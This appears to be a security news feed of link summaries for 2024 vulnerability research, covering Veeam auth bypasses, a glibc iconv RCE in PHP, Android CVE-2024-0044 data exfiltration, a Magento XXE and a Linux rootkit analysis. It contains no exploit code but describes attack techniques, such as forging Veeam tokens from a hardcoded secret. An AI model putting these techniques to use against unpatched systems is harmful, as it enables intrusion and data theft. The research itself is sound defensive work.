Bypassing Veeam Authentication CVE-2024-29849 #VeeamAuthBypass #CVE202429849 #TeamTraining #Exploits #Advisories https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
Summoning Team
Bypassing Veeam Authentication CVE-2024-29849
An interesting authentication bypass exploit in Veeam Backup Enterprise Manager
👍2
Finding the slab cache for each object in Linux kernel using static analysis #LinuxKernel #StaticAnalysis #SlabCache #Clang #llvmorg13.0.1 https://albocoder.github.io/exploitation/linux%20kernel/2024/06/09/KernelStaticAnalysis.html
Erin Avllazagaj
Finding the slab cache for each object in Linux kernel using static analysis
The State of Go Fuzzing - Did we already reach the peak? #GoFuzzing #StateOfTheArt #NativeFuzzing #ToolingLandscape #FuzzingEcosystem https://0x434b.dev/the-state-of-go-fuzzing-did-we-already-reach-the-peak/
Low-level adventures
The State of Go Fuzzing - Did we already reach the peak?
During one of the recent working days, I was tasked with fuzzing some Go applications. That's something I had not done in a while, so my first course of action was to research the current state of the art of the tooling landscape. After like a couple of hours…
🤮1
Thecus NAS Firmware Decryption #FirmwareDecryption #ThecusNAS #DES-CBC #LegacyCiphers https://starkeblog.com/cryptography/firmware/2024/06/11/thecus-nas-firmware-decrypt.html
A Visual Guide to Pointer Analysis with cclyzer++: Part 1 #Galois #PointerAnalysis #cclyzer++ #VisualGuide #StaticAnalysis https://galois.com/blog/2022/08/cclyzer/
🔥3
There are no Secrets || Exploiting Veeam CVE-2024-29855 #VeeamCVE #AuthenticationBypass #Exploits #TokenGeneration #TokenValidation https://summoning.team/blog/veeam-recovery-orchestrator-auth-bypass-cve-2024-29855/
Summoning Team
There are no Secrets || Exploiting Veeam CVE-2024-29855
This vulenrability is due to the fact that JWT secret used to generate authentication tokens was a hardcoded value which means an unauthenticated attacker can generate valid tokens for any user (not just the administrator) and login to the Veeam Recovery…
Stepping Stones – A Red Team Activity Hub #RedTeam #CybersecurityResearch #RealWorldCryptography #VulnerabilityManagement #DigitalSecurity https://research.nccgroup.com/2024/06/12/stepping-stones-a-red-team-activity-hub/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
👍2
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 2) #IconvExploit #GlibcHack #PHP #CharsetRCE #RoundcubeVulnerability https://www.ambionics.io/blog/iconv-cve-2024-2961-p2
Ambionics
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 2)
In this blog post, we will explore a new way of exploiting the vulnerability on PHP, using direct calls to iconv(), and illustrate the vulnerability by targeting Roundcube, a popular PHP webmail.
Abusing noscript reporting and tmux integration in iTerm2 for code execution #iTerm2 #CodeExecution #SecurityVulnerability #TitleReportingAbuse #FixReleased https://vin01.github.io/piptagole/escape-sequences/iterm2/rce/2024/06/16/iterm2-rce-window-noscript-tmux-integration.html
Vin01’s Blog
Abusing noscript reporting and tmux integration in iTerm2 for code execution
Regression turned into RCE
👍1
Exfiltrate sensitive user data from apps on Android 12 and 13 using CVE-2024-0044 vulnerability #AndroidHacking #CVE20240044 #DataExfiltration #MobileHacker #Vulnerability https://www.mobile-hacker.com/2024/06/17/exfiltrate-sensitive-user-data-from-apps-on-android-12-and-13-using-cve-2024-0044-vulnerability/
Mobile Hacker
Exfiltrate sensitive user data from apps on Android 12 and 13 using CVE-2024-0044 vulnerability Mobile Hacker
With physical access to Android device with enabled ADB debugging running Android 12 or 13 before receiving March 2024 security patch, it is possible to access internal data of any user installed app by misusing CVE-2024-0044 vulnerability. Internal data…
🔥1
Extending Burp Suite for fun and profit – The Montoya way – Part 5 #BurpSuite #ExtensionDevelopment #Security #MontoyaWay #Part5 https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-5/
HN Security
Extending Burp Suite for fun and profit - The Montoya way - Part 5 - HN Security
Setting up the environment + Hello World Inspecting and tampering HTTP requests and responses Inspecting and tampering WebSocket messages Creating […]
Beyond the @ Symbol: Exploiting the Flexibility of Email Addresses For Offensive Purposes #EmailExploitation #MailCleanerVulnerabilities #OSCommandInjection #CrossSiteScripting #EmailSecurity https://modzero.com/en/blog/beyond_the_at_symbol/
Restructuring the Binary Ninja Decompiler #BinaryNinja #Decompiler #ControlFlow #Improvements #Readability https://binary.ninja/2024/06/19/restructuring-the-decompiler.html
Binary Ninja
Binary Ninja - Restructuring the Binary Ninja Decompiler
Binary Ninja is a modern reverse engineering platform with a noscriptable and extensible decompiler.
🔥1
Analysis of CVE-2024-25065: Apache OFBiz Security bypass #CVE-2024-25065 #ApacheOFBiz #SecurityBypass #UnauthorizedAccess #PenetrationTesting https://blog.securelayer7.net/security-bypass-in-apache-ofbiz/
SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
Analysis of CVE-2024-25065: Apache OFBiz Security bypass
Introduction CVE-2024-25065 is a vulnerability that exists in Apache OFBiz before version 18.12.12. It is a path traversal vulnerability that allows authentication bypass through the contextPath...
Zip Slip meets Artifactory: A Bug Bounty Story #ZipSlip #Artifactory #BugBounty #SecurityVulnerability #RemoteCodeExecution https://karmainsecurity.com/zip-slip-meets-artifactory-a-bug-bounty-story
Karmainsecurity
Zip Slip meets Artifactory: A Bug Bounty Story | Karma(In)Security
This is the personal website of Egidio Romano, a very curious guy from Sicily, Italy. He's a computer security enthusiast, particularly addicted to webapp security.
Understanding Protected Management Frames (PMF) in Wi-Fi #PMF #ProtectedManagementFrames #WiFiSecurity #ManagementFrames #TheXero https://www.thexero.co.uk/blog/Understanding-PMF
Two bluetooth vulnerabilities in Windows #WindowsBluetoothVulnerabilities #CVE202324871 #CVE202323388 #RCE #LPE https://ynwarcs.github.io/z-btadv-cves
###
Two bluetooth vulnerabilities in Windows
Reverse engineering eBPF programs #eBPF #ReverseEngineering #Security #Kubernetes #ARMOPlatform https://www.armosec.io/blog/ebpf-reverse-engineering-programs/
ARMO
Reverse Engineering eBPF Programs: A Deep Dive
Explore how eBPF technology works by reverse engineering eBPF-based programs. Learn about its internals, benefits, and applications in modern computing
🔥1
New Diamorphine rootkit variant seen undetected in the wild #NewDiamorphine #RootkitVariant #UndetectedInTheWild #AvastThreatLabs #LinuxKernel https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/
Gendigital
New Diamorphine rootkit variant seen undetected in the wild
Advanced Features of New Diamorphine
Why nested deserialization is harmful: Magento XXE (CVE-2024-34102) #MagentoCVE #XXE #NestedDeserialization #SecurityResearch #BreakingNews https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
www.assetnote.io
Why nested deserialization is harmful: Magento XXE (CVE-2024-34102)
A critical, pre-authentication XML entity injection issue in Magento / Adobe Commerce (CVE-2024-34102), which Adobe rated as CVSS 9.8.